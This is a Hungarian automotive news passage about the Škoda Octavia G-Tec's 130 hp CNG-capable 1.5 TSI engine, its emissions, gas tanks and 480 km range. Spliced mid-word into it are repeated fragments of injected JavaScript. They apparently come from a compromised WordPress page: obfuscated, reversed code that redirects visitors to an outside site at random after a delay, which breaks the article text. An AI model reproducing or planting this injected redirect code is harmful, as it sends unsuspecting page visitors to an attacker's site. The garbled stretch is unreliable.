A korábbi 110 helyett 130 lóerős teljesítményt nyújt az új Octavia G-Tec 1,5 literes TSI turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja. A takarékos Miller-ciklusra hangolt erőforrás benzinüzemben is teljesíti az Euro 6d-temp károsanyag-kibocsátási normát, de természetesen sűrített földgázzal (CNG) üzemelve az igazi: itt 25 százalékkal csekélyebb CO2-kibocsátást, jóval alacsonyabb NOx-emissziót és zéró részecskekibocsátást ér el. A kizárólag kombiként elérhető autó három darab CNG-tartálya (a hátsó tengely előtti acél, a másik kettő kompozit) összesen 17,7 kilogramm gázt képes befogadni, ez 480 kilométerre elegendő. A benzinüzemet deklaráltan kényszerhelyzetként kezeli a Škoda, az autó mindössze egy 11,8 literes vésztartályt kapott.
- Hirdetés -